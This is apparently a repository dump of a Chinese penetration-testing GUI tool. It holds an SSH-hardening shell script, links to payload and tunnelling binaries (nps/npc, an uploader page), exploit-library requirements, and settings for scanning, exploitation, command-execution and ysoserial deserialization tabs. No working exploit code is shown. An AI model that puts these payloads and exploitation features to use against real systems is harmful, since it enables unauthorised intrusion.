    [[ $(grep "${PUB_KEY}" "${HOME}/.ssh/authorized_keys") ]] &&
        echo -e "${INFO} SSH Key installed successfully!" || {
        echo -e "${ERROR} SSH key installation failed!"
        exit 1
    }
}

# Set "Port <SSH_PORT>" in sshd_config. On Termux/Android the file lives
# under $PREFIX and a line is appended when no "Port " line exists;
# elsewhere the existing line is rewritten in place via sudo. Sets
# RESTART_SSHD: 1 = restart with systemctl at the end, 2 = Android, user is
# told to restart.
# NOTE(review): the sed rewrites every line containing "Port " (a commented
# "#Port 22" included), `[ $(uname -o) == Android ]` raises a test error
# (and takes the else branch) when `uname -o` prints nothing, and SSH_PORT
# is never validated as a number.
change_port() {
    echo -e "${INFO} Changing SSH port to ${SSH_PORT} ..."
    if [ $(uname -o) == Android ]; then
        [[ -z $(grep "Port " "$PREFIX/etc/ssh/sshd_config") ]] &&
            echo -e "${INFO} Port ${SSH_PORT}" >>$PREFIX/etc/ssh/sshd_config ||
            sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" $PREFIX/etc/ssh/sshd_config
        [[ $(grep "Port " "$PREFIX/etc/ssh/sshd_config") ]] && {
            echo -e "${INFO} SSH port changed successfully!"
            RESTART_SSHD=2
        } || {
            RESTART_SSHD=0
            echo -e "${ERROR} SSH port change failed!"
            exit 1
        }
    else
        $SUDO sed -i "s@.*\(Port \).*@\1${SSH_PORT}@" /etc/ssh/sshd_config && {
            echo -e "${INFO} SSH port changed successfully!"
            RESTART_SSHD=1
        } || {
            RESTART_SSHD=0
            echo -e "${ERROR} SSH port change failed!"
            exit 1
        }
    fi
}

# Set "PasswordAuthentication no" in sshd_config (same Android/$PREFIX vs.
# sudo split as change_port) and flag the restart. Nothing checks that the
# config contained a matching line: sed -i exits 0 even when it changed
# nothing, so "Disabled password login" can be printed without any edit.
disable_password() {
    if [ $(uname -o) == Android ]; then
        sed -i "s@.*\(PasswordAuthentication \).*@\1no@" $PREFIX/etc/ssh/sshd_config && {
            RESTART_SSHD=2
            echo -e "${INFO} Disabled password login in SSH."
        } || {
            RESTART_SSHD=0
            echo -e "${ERROR} Disable password login failed!"
            exit 1
        }
    else
        $SUDO sed -i "s@.*\(PasswordAuthentication \).*@\1no@" /etc/ssh/sshd_config && {
            RESTART_SSHD=1
            echo -e "${INFO} Disabled password login in SSH."
        } || {
            RESTART_SSHD=0
            echo -e "${ERROR} Disable password login failed!"
            exit 1
        }
    fi
}

# Options take effect in the order given: -o only influences a later
# -g/-u/-f, and each key option fetches and installs immediately.
while getopts "og:u:f:p:d" OPT; do
    case $OPT in
    o)
        OVERWRITE=1
        ;;
    g)
        KEY_ID=$OPTARG
        get_github_key
        install_key
        ;;
    u)
        KEY_URL=$OPTARG
        get_url_key
        install_key
        ;;
    f)
        KEY_PATH=$OPTARG
        get_loacl_key
        install_key
        ;;
    p)
        SSH_PORT=$OPTARG
        change_port
        ;;
    d)
        disable_password
        ;;
    ?)  # unknown option or missing argument (getopts is not in silent mode here)
        USAGE
        exit 1
        ;;
    :)  # only produced in getopts silent mode (leading ':' in the optstring), so presumably unreachable with this optstring
        USAGE
        exit 1
        ;;
    *)
        USAGE
        exit 1
        ;;
    esac
done

# Restart sshd only when a config edit asked for it (RESTART_SSHD=1);
# on Android (2) a reminder is printed instead.
if [ "$RESTART_SSHD" = 1 ]; then
    echo -e "${INFO} Restarting sshd..."
    $SUDO systemctl restart sshd && echo -e "${INFO} Done."
elif [ "$RESTART_SSHD" = 2 ]; then
    echo -e "${INFO} Restart sshd or Termux App to take effect."
fi
-------------------------------------------------------------------------------- /payload_html/kindeditor.html: --------------------------------------------------------------------------------
Uploader
-------------------------------------------------------------------------------- /payload_html/npc: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc
-------------------------------------------------------------------------------- /payload_html/npc.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/npc.exe
-------------------------------------------------------------------------------- /payload_html/nps: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/nps
-------------------------------------------------------------------------------- /payload_html/wget.exe: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/payload_html/wget.exe
-------------------------------------------------------------------------------- /python.ico: --------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/python.ico
-------------------------------------------------------------------------------- /requirements.txt: --------------------------------------------------------------------------------
requests==2.26.0
pysocks==1.7.1
prettytable==2.4.0
exp10it==2.7.81
Crypto==1.4.1
click==8.0.1
pycryptodome==3.10.1
jinja2==3.0.3
requests_toolbelt==0.9.1
openpyxl==3.0.9
ajpy==0.0.5
-------------------------------------------------------------------------------- /settings.py:
--------------------------------------------------------------------------------
"""Shared GUI settings: tkinter variables backing the tool's tabs.

Importing this module creates StringVar/IntVar instances at module level,
so the importer must already have created a Tk root (tkinter needs a
default root to build variables) -- NOTE(review): confirm against the
GUI entry point.
"""
from tkinter import StringVar,IntVar
import os
import sys

### Project path ###
# Directory of the running interpreter/executable (sys.executable); this is
# the project directory only when the tool is shipped as a frozen binary.
curPath = os.path.dirname(os.path.realpath(sys.executable))
scriptPath = os.getcwd()  # working directory at import time

# Proxy sites
Proxy_page = IntVar(value=1)  # number of proxy-list pages to crawl
Proxy_webtitle = StringVar(value='米扑代理')  # selected proxy site; a key of Proxy_web
# Display name -> fetcher identifier (presumably a method name on the proxy
# fetcher; verify against Proxy/proxyFetcher.py). The numbering skips 10-12.
Proxy_web = {
    '米扑代理' : 'freeProxy01',
    '66代理' : 'freeProxy02',
    'pzzqz' : 'freeProxy03',
    '神鸡代理' : 'freeProxy04',
    '快代理' : 'freeProxy05',
    '极速代理' : 'freeProxy06',
    '云代理' : 'freeProxy07',
    '小幻代理' : 'freeProxy08',
    '免费代理库' : 'freeProxy09',
    '89免费代理' : 'freeProxy13',
    '西拉代理' : 'freeProxy14',
}

# Proxy tab
Proxy_type = StringVar(value='HTTP/HTTPS')  # Proxy tab: proxy type
Proxy_CheckVar1 = IntVar()  # Proxy tab: proxy on/off switch 1
Proxy_CheckVar2 = IntVar()  # Proxy tab: proxy on/off switch 0
Proxy_addr = StringVar(value='127.0.0.1')  # Proxy tab: proxy IP
Proxy_port = StringVar(value='8080')  # Proxy tab: proxy port

# Vulnerability scan tab (A)
Ent_A_Top_thread = StringVar(value='3')  # Scan tab, top bar: thread count
# User-facing help text for the scan tab (runtime string, kept verbatim).
Ent_A_Top_Text = '''[*]请输入正确的网址,比如 [http://www.baidu.com]
[*]请注意有些需要使用域名, 有些需要使用IP!
[*]漏洞扫描模块是检测漏洞的, 命令执行需要在漏洞利用模块使用!
[-]有处BUG, 在读取py文件时, 如果引号前面有字母存在会出错, 如 f'', r''
'''

# Exploit tab (B)
Ent_B_Top_url = StringVar(value='')  # Exploit tab, top bar: target URL
Ent_B_Top_cookie = StringVar(value='暂时无用')  # Exploit tab, top bar: Cookie (placeholder text says it is unused for now)
Ent_B_Top_vulname = StringVar(value='请选择漏洞名称')  # Exploit tab, top bar: vulnerability name (placeholder: "select a vulnerability")
Ent_B_Top_vulmethod = StringVar(value='ALL')  # Exploit tab, top bar: method to invoke
Ent_B_Top_funtype = StringVar(value='False')  # Exploit tab, top bar: exp function flag
Ent_B_Top_timeout = StringVar(value='5')  # Exploit tab, top bar: request timeout
Ent_B_Top_retry_time = StringVar(value='1')  # Exploit tab, top bar: retry count
Ent_B_Top_retry_interval = StringVar(value='1')  # Exploit tab, top bar: retry interval
Ent_B_Bottom_Left_cmd = StringVar()  # Exploit tab, bottom-left: command input box
Ent_B_Bottom_terminal_cmd = StringVar()  # Exploit tab, terminal: command input box

# Vulnerability test tab (C)
Ent_C_Top_url = StringVar(value='http://httpbin.org')  # Test tab, top bar: target URL
Ent_C_Top_path = StringVar(value='/ip')  # Test tab, top bar: request path
Ent_C_Top_reqmethod = StringVar(value='GET')  # Test tab, top bar: HTTP method
Ent_C_Top_vulname = StringVar(value='用作类名, 不能包含空格')  # Test tab, top bar: script name (placeholder: used as a class name, no spaces)
Ent_C_Top_cmsname = StringVar(value='')  # Test tab, top bar: CMS name
Ent_C_Top_cvename = StringVar(value='cve_')  # Test tab, top bar: CVE id prefix
Ent_C_Top_version = StringVar(value='app=\'\'')  # Test tab, top bar: version expression
Ent_C_Top_info = StringVar(value='命令执行描述')  # Test tab, top bar: description placeholder
Ent_C_Top_template = StringVar(value='请选择模板')  # Test tab, top bar: template placeholder ("select a template")

# Test
Ent_Cmds_Top_type = StringVar()  # Command console tab, top bar: vulnerability type
Ent_Cmds_Top_typevar = StringVar(value='yy yang haha 1 2 3 4 5 7 8 0')  # Command console tab, top bar: sample type values

# Deserialization exploit tab
Ent_yso_Top_type = StringVar(value='-jar')  # ysoserial tab, top bar: invocation type
Ent_yso_Top_class = StringVar(value='利用链类')  # ysoserial tab, top bar: gadget-chain class placeholder
Ent_yso_Top_cmd = StringVar(value='whoami')  # ysoserial tab, top bar: command

# TCP debug tab
TCP_Debug_IP = StringVar(value='127.0.0.1')  # TCP debug tab: IP address
TCP_Debug_PORT = IntVar(value=80)  # TCP debug tab: port
TCP_Debug_PKT_BUFF_SIZE = IntVar(value=2048)  # TCP debug tab: receive buffer size

# Other variables
# Name -> tkinter variable lookup for the proxy settings. Note the key
# "PROXY_TYPE" does not follow the variable's own name (Proxy_type).
variable_dict = {
    "Proxy_CheckVar1" : Proxy_CheckVar1,
    "Proxy_CheckVar2" : Proxy_CheckVar2,
    "PROXY_TYPE" : Proxy_type,
    "Proxy_addr" : Proxy_addr,
    "Proxy_port" : Proxy_port,
    "Proxy_page" : Proxy_page,
    "Proxy_webtitle" : Proxy_webtitle,
}
-------------------------------------------------------------------------------- /util/globalvar.py: --------------------------------------------------------------------------------
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Process-wide key/value store (GlobalVar).

_init() must be called once before set_value()/get_value(); until then the
module-level _global_dict does not exist and both raise NameError. Calling
_init() again discards every stored value.
"""
def _init() -> None:
    """Create (or reset) the module-level store."""
    global _global_dict
    _global_dict = {}

def set_value(name, value: object) -> None:
    """Store *value* under *name*, replacing any previous entry."""
    _global_dict[name] = value

def get_value(name, defValue: object = None) -> object:
    """Return the value stored under *name*, or *defValue* when absent."""
    try:
        return _global_dict[name]
    except KeyError:
        return defValue
--------------------------------------------------------------------------------